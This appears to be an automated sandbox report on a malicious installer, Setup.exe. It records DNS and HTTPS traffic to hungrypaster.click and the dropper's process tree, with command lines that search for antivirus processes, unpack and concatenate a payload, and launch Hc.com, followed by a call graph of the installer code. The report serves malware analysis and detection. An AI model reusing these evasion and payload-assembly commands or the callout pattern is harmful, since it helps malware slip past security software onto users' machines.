Dec 24, 2024 01:26:35.994781017 CET | 192.168.2.5 | 1.1.1.1 | 0x3450 | Standard query (0) | hungrypaster.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 01:26:17.605479002 CET | 1.1.1.1 | 192.168.2.5 | 0x3aaa | Name error (3) | PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 01:26:36.275945902 CET | 1.1.1.1 | 192.168.2.5 | 0x3450 | No error (0) | hungrypaster.click | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 01:26:36.275945902 CET | 1.1.1.1 | 192.168.2.5 | 0x3450 | No error (0) | hungrypaster.click | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
                                                                • hungrypaster.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49731 | 188.114.96.6 | 443 | 2128 | C:\Users\user\AppData\Local\Temp\280366\Hc.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 00:26:37 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: hungrypaster.click
2024-12-24 00:26:37 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-24 00:26:38 UTC | 1130 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 00:26:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8eb4nce9enp9mbfghlbbn59ogu; expires=Fri, 18 Apr 2025 18:13:17 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rhKrT0YOsXH%2BNadAmoqupzB2506UdiD9I9MPX2zaZ6gGzmzB7W3DjVhbLMSjuDgZQOJ%2BYp9RsPGrPY72bTNTO8lOM%2BeLd1BvZR%2BzOwOAvrfjKYirk7jTMKkFfILteG4HLFzs9qQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6c7602fc114378-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1604&rtt_var=677&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1820448&cwnd=235&unsent_bytes=0&cid=fa2ebc908b2867b5&ts=1303&x=0"
2024-12-24 00:26:38 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-24 00:26:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 19:26:11
Start date: 23/12/2024
Path: C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Setup.exe"
Imagebase: 0x400000
File size: 73'409'696 bytes
MD5 hash: 588EEB3D8F305FC008F034E10E0015C0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 19:26:12
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 19:26:12
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 19:26:14
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0x250000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 19:26:14
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /I "opssvc wrsa"
Imagebase: 0xf40000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 19:26:14
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0x250000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 19:26:14
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase: 0xf40000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 19:26:14
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c md 280366
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 19:26:14
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit): true
Commandline: extrac32 /Y /E Agrees
Imagebase: 0x3f0000
File size: 29'184 bytes
MD5 hash: 9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 10
Start time: 19:26:15
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /V "Travels" Served
Imagebase: 0xf40000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 19:26:15
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 12
Start time: 19:26:15
Start date: 23/12/2024
Path: C:\Users\user\AppData\Local\Temp\280366\Hc.com
Wow64 process (32bit): true
Commandline: Hc.com I
Imagebase: 0x620000
File size: 947'288 bytes
MD5 hash: 62D09F076E6E0240548C2F837536A46A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited: true

Target ID: 13
Start time: 19:26:15
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit): true
Commandline: choice /d y /t 5
Imagebase: 0x570000
File size: 28'160 bytes
MD5 hash: FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Execution Graph

Execution Coverage: 17.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 21%
Total number of Nodes: 1482
Total number of Limit Nodes: 26
3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 
4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3891 4038af #17 SetErrorMode OleInitialize 3892 406328 3 API calls 3891->3892 3893 4038f2 SHGetFileInfoW 3892->3893 3965 406035 lstrcpynW 3893->3965 3895 40391d GetCommandLineW 3966 406035 
lstrcpynW 3895->3966 3897 40392f GetModuleHandleW 3898 403947 3897->3898 3899 405d32 CharNextW 3898->3899 3900 403956 CharNextW 3899->3900 3911 403968 3900->3911 3901 403a02 3902 403a21 GetTempPathW 3901->3902 3967 4037f8 3902->3967 3904 403a37 3906 403a3b GetWindowsDirectoryW lstrcatW 3904->3906 3907 403a5f DeleteFileW 3904->3907 3905 405d32 CharNextW 3905->3911 3909 4037f8 11 API calls 3906->3909 3975 4035b3 GetTickCount GetModuleFileNameW 3907->3975 3912 403a57 3909->3912 3910 403a73 3913 403af8 3910->3913 3915 405d32 CharNextW 3910->3915 3951 403add 3910->3951 3911->3901 3911->3905 3918 403a04 3911->3918 3912->3907 3912->3913 4060 403885 3913->4060 3919 403a8a 3915->3919 4067 406035 lstrcpynW 3918->4067 3930 403b23 lstrcatW lstrcmpiW 3919->3930 3931 403ab5 3919->3931 3920 403aed 3923 406113 9 API calls 3920->3923 3921 403bfa 3924 403c7d 3921->3924 3926 406328 3 API calls 3921->3926 3922 403b0d 3925 405ccc MessageBoxIndirectW 3922->3925 3923->3913 3927 403b1b ExitProcess 3925->3927 3929 403c09 3926->3929 3933 406328 3 API calls 3929->3933 3930->3913 3932 403b3f CreateDirectoryW SetCurrentDirectoryW 3930->3932 4068 4067aa 3931->4068 3935 403b62 3932->3935 3936 403b57 3932->3936 3937 403c12 3933->3937 4085 406035 lstrcpynW 3935->4085 4084 406035 lstrcpynW 3936->4084 3941 406328 3 API calls 3937->3941 3944 403c1b 3941->3944 3943 403b70 4086 406035 lstrcpynW 3943->4086 3945 403c69 ExitWindowsEx 3944->3945 3950 403c29 GetCurrentProcess 3944->3950 3945->3924 3949 403c76 3945->3949 3946 403ad2 4083 406035 lstrcpynW 3946->4083 3952 40141d 80 API calls 3949->3952 3954 403c39 3950->3954 4003 405958 3951->4003 3952->3924 3953 406831 18 API calls 3955 403b98 DeleteFileW 3953->3955 3954->3945 3956 403ba5 CopyFileW 3955->3956 3962 403b7f 3955->3962 3956->3962 3957 403bee 3958 406c94 42 API calls 3957->3958 3960 403bf5 3958->3960 3959 406c94 42 API calls 3959->3962 3960->3913 3961 406831 18 API calls 3961->3962 3962->3953 3962->3957 3962->3959 3962->3961 3964 403bd9 
CloseHandle 3962->3964 4087 405c6b CreateProcessW 3962->4087 3964->3962 3965->3895 3966->3897 3968 406064 5 API calls 3967->3968 3969 403804 3968->3969 3970 40380e 3969->3970 3971 40674e 3 API calls 3969->3971 3970->3904 3972 403816 CreateDirectoryW 3971->3972 3973 405eab 2 API calls 3972->3973 3974 40382a 3973->3974 3974->3904 4090 405e7c GetFileAttributesW CreateFileW 3975->4090 3977 4035f3 3997 403603 3977->3997 4091 406035 lstrcpynW 3977->4091 3979 403619 4092 40677d lstrlenW 3979->4092 3983 40362a GetFileSize 3984 403726 3983->3984 3998 403641 3983->3998 4097 4032d2 3984->4097 3986 40372f 3988 40376b GlobalAlloc 3986->3988 3986->3997 4109 403368 SetFilePointer 3986->4109 3987 403336 ReadFile 3987->3998 4108 403368 SetFilePointer 3988->4108 3991 4037e9 3994 4032d2 6 API calls 3991->3994 3992 403786 3995 40337f 33 API calls 3992->3995 3993 40374c 3996 403336 ReadFile 3993->3996 3994->3997 4001 403792 3995->4001 4000 403757 3996->4000 3997->3910 3998->3984 3998->3987 3998->3991 3998->3997 3999 4032d2 6 API calls 3998->3999 3999->3998 4000->3988 4000->3997 4001->3997 4001->4001 4002 4037c0 SetFilePointer 4001->4002 4002->3997 4004 406328 3 API calls 4003->4004 4005 40596c 4004->4005 4006 405972 4005->4006 4007 405984 4005->4007 4123 405f7d wsprintfW 4006->4123 4008 405eff 3 API calls 4007->4008 4009 4059b5 4008->4009 4011 4059d4 lstrcatW 4009->4011 4013 405eff 3 API calls 4009->4013 4012 405982 4011->4012 4114 403ec1 4012->4114 4013->4011 4016 4067aa 18 API calls 4017 405a06 4016->4017 4018 405a9c 4017->4018 4020 405eff 3 API calls 4017->4020 4019 4067aa 18 API calls 4018->4019 4021 405aa2 4019->4021 4022 405a38 4020->4022 4023 405ab2 4021->4023 4024 406831 18 API calls 4021->4024 4022->4018 4026 405a5b lstrlenW 4022->4026 4029 405d32 CharNextW 4022->4029 4025 405ad2 LoadImageW 4023->4025 4125 403ea0 4023->4125 4024->4023 4027 405b92 4025->4027 4028 405afd RegisterClassW 4025->4028 4030 405a69 lstrcmpiW 4026->4030 4031 405a8f 4026->4031 4035 40141d 80 API calls 
4027->4035 4033 405b9c 4028->4033 4034 405b45 SystemParametersInfoW CreateWindowExW 4028->4034 4036 405a56 4029->4036 4030->4031 4037 405a79 GetFileAttributesW 4030->4037 4039 40674e 3 API calls 4031->4039 4033->3920 4034->4027 4040 405b98 4035->4040 4036->4026 4041 405a85 4037->4041 4038 405ac8 4038->4025 4042 405a95 4039->4042 4040->4033 4043 403ec1 19 API calls 4040->4043 4041->4031 4044 40677d 2 API calls 4041->4044 4124 406035 lstrcpynW 4042->4124 4046 405ba9 4043->4046 4044->4031 4047 405bb5 ShowWindow LoadLibraryW 4046->4047 4048 405c38 4046->4048 4049 405bd4 LoadLibraryW 4047->4049 4050 405bdb GetClassInfoW 4047->4050 4051 405073 83 API calls 4048->4051 4049->4050 4052 405c05 DialogBoxParamW 4050->4052 4053 405bef GetClassInfoW RegisterClassW 4050->4053 4054 405c3e 4051->4054 4057 40141d 80 API calls 4052->4057 4053->4052 4055 405c42 4054->4055 4056 405c5a 4054->4056 4055->4033 4059 40141d 80 API calls 4055->4059 4058 40141d 80 API calls 4056->4058 4057->4033 4058->4033 4059->4033 4061 40389d 4060->4061 4062 40388f CloseHandle 4060->4062 4132 403caf 4061->4132 4062->4061 4067->3902 4185 406035 lstrcpynW 4068->4185 4070 4067bb 4071 405d85 4 API calls 4070->4071 4072 4067c1 4071->4072 4073 406064 5 API calls 4072->4073 4080 403ac3 4072->4080 4076 4067d1 4073->4076 4074 406809 lstrlenW 4075 406810 4074->4075 4074->4076 4078 40674e 3 API calls 4075->4078 4076->4074 4077 406301 2 API calls 4076->4077 4076->4080 4081 40677d 2 API calls 4076->4081 4077->4076 4079 406816 GetFileAttributesW 4078->4079 4079->4080 4080->3913 4082 406035 lstrcpynW 4080->4082 4081->4074 4082->3946 4083->3951 4084->3935 4085->3943 4086->3962 4088 405ca6 4087->4088 4089 405c9a CloseHandle 4087->4089 4088->3962 4089->4088 4090->3977 4091->3979 4093 40678c 4092->4093 4094 406792 CharPrevW 4093->4094 4095 40361f 4093->4095 4094->4093 4094->4095 4096 406035 lstrcpynW 4095->4096 4096->3983 4098 4032f3 4097->4098 4099 4032db 4097->4099 4102 403303 GetTickCount 4098->4102 4103 4032fb 4098->4103 
4100 4032e4 DestroyWindow 4099->4100 4101 4032eb 4099->4101 4100->4101 4101->3986 4105 403311 CreateDialogParamW ShowWindow 4102->4105 4106 403334 4102->4106 4110 40635e 4103->4110 4105->4106 4106->3986 4108->3992 4109->3993 4111 40637b PeekMessageW 4110->4111 4112 406371 DispatchMessageW 4111->4112 4113 403301 4111->4113 4112->4111 4113->3986 4115 403ed5 4114->4115 4130 405f7d wsprintfW 4115->4130 4117 403f49 4118 406831 18 API calls 4117->4118 4119 403f55 SetWindowTextW 4118->4119 4120 403f70 4119->4120 4121 403f8b 4120->4121 4122 406831 18 API calls 4120->4122 4121->4016 4122->4120 4123->4012 4124->4018 4131 406035 lstrcpynW 4125->4131 4127 403eb4 4128 40674e 3 API calls 4127->4128 4129 403eba lstrcatW 4128->4129 4129->4038 4130->4117 4131->4127 4133 403cbd 4132->4133 4134 4038a2 4133->4134 4135 403cc2 FreeLibrary GlobalFree 4133->4135 4136 406cc7 4134->4136 4135->4134 4135->4135 4137 4067aa 18 API calls 4136->4137 4138 406cda 4137->4138 4139 406ce3 DeleteFileW 4138->4139 4140 406cfa 4138->4140 4179 4038ae CoUninitialize 4139->4179 4141 406e77 4140->4141 4183 406035 lstrcpynW 4140->4183 4147 406301 2 API calls 4141->4147 4167 406e84 4141->4167 4141->4179 4143 406d25 4144 406d39 4143->4144 4145 406d2f lstrcatW 4143->4145 4148 40677d 2 API calls 4144->4148 4146 406d3f 4145->4146 4150 406d4f lstrcatW 4146->4150 4152 406d57 lstrlenW FindFirstFileW 4146->4152 4149 406e90 4147->4149 4148->4146 4153 40674e 3 API calls 4149->4153 4149->4179 4150->4152 4151 4062cf 11 API calls 4151->4179 4156 406e67 4152->4156 4180 406d7e 4152->4180 4154 406e9a 4153->4154 4157 4062cf 11 API calls 4154->4157 4155 405d32 CharNextW 4155->4180 4156->4141 4158 406ea5 4157->4158 4159 405e5c 2 API calls 4158->4159 4160 406ead RemoveDirectoryW 4159->4160 4164 406ef0 4160->4164 4165 406eb9 4160->4165 4161 406e44 FindNextFileW 4163 406e5c FindClose 4161->4163 4161->4180 4163->4156 4166 404f9e 25 API calls 4164->4166 4165->4167 4168 406ebf 4165->4168 4166->4179 4167->4151 4170 4062cf 11 API calls 
4168->4170 4169 4062cf 11 API calls 4169->4180 4171 406ec9 4170->4171 4174 404f9e 25 API calls 4171->4174 4172 406cc7 72 API calls 4172->4180 4173 405e5c 2 API calls 4175 406dfa DeleteFileW 4173->4175 4176 406ed3 4174->4176 4175->4180 4177 406c94 42 API calls 4176->4177 4177->4179 4178 404f9e 25 API calls 4178->4161 4179->3921 4179->3922 4180->4155 4180->4161 4180->4169 4180->4172 4180->4173 4180->4178 4181 404f9e 25 API calls 4180->4181 4182 406c94 42 API calls 4180->4182 4184 406035 lstrcpynW 4180->4184 4181->4180 4182->4180 4183->4143 4184->4180 4185->4070 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3717 4021b5 3718 40145c 18 API calls 3717->3718 3719 4021bb 3718->3719 3720 40145c 18 API calls 3719->3720 3721 4021c4 3720->3721 3722 40145c 18 API calls 3721->3722 3723 4021cd 3722->3723 3724 40145c 18 API calls 3723->3724 3725 4021d6 3724->3725 3726 404f9e 25 API calls 3725->3726 3727 4021e2 ShellExecuteW 3726->3727 3728 40221b 3727->3728 3729 40220d 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 4062cf 11 API calls 3729->3731 3732 402230 3730->3732 3731->3728 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 
4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                  Control-flow Graph
                                                                  (Edge list for the function at 4050f9, as rendered by the report's graph viewer, omitted; not reproducible as text. The API calls it makes are listed under APIs below.)
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                  • GetClientRect.USER32(?,?), ref: 004051C2
                                                                  • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                    • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                  • ShowWindow.USER32(00000000), ref: 00405313
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                  • ShowWindow.USER32(00000008), ref: 0040535F
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                  • CreatePopupMenu.USER32 ref: 004053A2
                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                  • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                  • OpenClipboard.USER32(00000000), ref: 00405437
                                                                  • EmptyClipboard.USER32 ref: 0040543D
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                  • CloseClipboard.USER32 ref: 0040549A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
